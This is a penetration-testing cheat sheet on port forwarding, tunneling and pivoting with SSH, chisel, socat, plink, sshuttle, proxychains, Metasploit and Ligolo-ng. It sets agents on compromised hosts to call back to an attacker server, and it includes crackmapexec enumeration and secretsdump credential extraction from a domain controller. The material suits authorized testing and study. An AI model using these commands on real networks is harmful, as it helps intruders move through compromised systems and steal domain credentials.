port_forwarding_and_tunneling.md

Port Fowarding and Proxying

Port Fowarding

SSH Tunneling/Local Port Forwarding

ssh user@<IP> -p port -L 8001:127.0.0.1:8080 -fN

SSH Remote Port Forwarding

ssh -R 5555:127.0.0.1:5555 -p2222 <user>@<IP>

Socat - Port Forward

./socat.exe TCP-LISTEN:8002,fork,reuseaddr TCP:127.0.0.1:8080

chisel - Remote Port Forward

-> Your machine

./chisel server -p <listen_port> --reverse &

-> Compromised Host

./chisel client <client_port>:<client_port> R:<local_port>:<target_IP>:<target_port> &

Chisel - Local Port Forward

-> Compromised Host

./chisel server -p <listen_port>

-> Your Machine

./chisel client <client_port>:<client_port> <local_port>:<target_IP>:<target_port>

-> Windows

• https://github.com/jpillora/chisel/releases/download/v1.11.5/chisel_1.11.5_windows_arm64.zip

-> Linux

• https://github.com/jpillora/chisel/releases/download/v1.11.5/chisel_1.11.5_linux_amd64.deb

pklink - Remote Port Forward

cmd.exe /c echo y | plink.exe -ssh -l <user> -pw <password> -R 192.168.0.20:1234:127.0.0.1:3306 192.168.0.20

Proxying - Network Pivoting

sshuttle (Unix) - proxying

sshuttle -r user@<ip> --ssh-cmd "ssh -i private_key" 172.16.0.0/24

SSH + Proxychains commands

edit /etc/proxychains.conf with socks4 127.0.0.1 8080

ssh -N -D 127.0.0.1:8080 <user>@<ip> -p 2222

proxychains ping <ip>

proxychains nc <ip> <port>

proxychains nmap -p <port> 192.168.0.0/24

proxychains crackmapexec smb -u <user> -p <password> <target> --shares

proxychains crackmapexec smb -u <user> -p <password> <dc-target> --users

proxychains crackmapexec smb -u <user> -p <password> <target> 

proxychains secretsdump.py -k -no-pass <dc> -just-dc-user '<domain>\<user>' -debug

chisel - Reverse Proxy

-> Your Machine

./chisel server -p listen_port --reverse &

-> Compromised Host

./chisel client <target_IP>:<listen_port> R:socks &

chisel - Forward Proxy

-> Compromised Host

./chisel server -p <listen_port> --socks5

-> Your Machine

./chisel client <target_P>:<listen_port> <proxy_port>:socks

metasploit - proxying

route add <ip>/24 1
route print
use auxiliary/server/socks_proxy
run

Ligolo-ng

-> Proxy

• https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

-> Agent

• https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

-> Installation

sudo apt install ligolo-ng

-> Proxy set up

sudo ip tuntap add user <Your Username> mode tun ligolo
sudo ip link set ligolo up

-> Start proxy

ligolo-proxy -h
ligolo-proxy -selfcert

-> Run the agent without ignoring certificates

./agent -connect attacker_server:11601

-> Agent set up

./agent -connect <Attack IP>:11601 -ignore-cert

-> Verify network interfaces

ifconfig

-> Add an entry to the routing table so Ligolo can route traffic through the tunnel and reach the target network

sudo ip route add <Internal_Network> dev ligolo
start

Performing a Ligolo-ng Double Pivot

-> Add a second TUN interface

sudo ip tuntap add user kali mode tun ligolo-double
sudo ip link set ligolo-double up

-> Create a listener

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
listener_list

-> Connect to the proxy server

./agent.exe -connect <IP of First Pivot Point>:11601 -ignore-cert

-> Start a tunnel and add a route

sudo ip add route <New_Network> dev ligolo-double